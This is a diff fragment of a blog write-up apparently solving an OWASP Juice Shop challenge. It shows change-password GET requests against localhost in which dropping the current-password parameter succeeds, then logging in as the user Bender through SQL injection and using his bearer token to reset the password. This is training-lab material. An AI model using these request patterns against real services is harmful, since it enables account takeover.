KarAshutosh/karashutosh.github.io/blogs/blog4.md

     - [http://localhost:3000/rest/user/change-password?current=A&new=B&repeat=C](http://localhost:3000/rest/user/change-password?current=A&new=B&repeat=C) also says `New and repeated password do not match.`
     - [http://localhost:3000/rest/user/change-password?current=A&new=B&repeat=B](http://localhost:3000/rest/user/change-password?current=A&new=B&repeat=B) says `Current password is not correct.`
     - [http://localhost:3000/rest/user/change-password?new=B&repeat=B](http://localhost:3000/rest/user/change-password?new=B&repeat=B) yields a `200` success returning the updated user as JSON!
-4. Now [Log in with Bender’s user account](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_log_in_with_benders_user_account) using SQL Injection.
+4. Now [Log in with Bender's user account](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_log_in_with_benders_user_account) using SQL Injection.
-5. Craft a GET request with Bender’s `Authorization Bearer` header to [http://localhost:3000/rest/user/change-password?new=slurmCl4ssic&repeat=slurmCl4ssic](http://localhost:3000/rest/user/change-password?new=slurmCl4ssic&repeat=slurmCl4ssic) to solve the challenge.
+5. Craft a GET request with Bender's `Authorization Bearer` header to [http://localhost:3000/rest/user/change-password?new=slurmCl4ssic&repeat=slurmCl4ssic](http://localhost:3000/rest/user/change-password?new=slurmCl4ssic&repeat=slurmCl4ssic) to solve the challenge.

     ![GET request via PostMan](media/blog4/csrf_postman.png)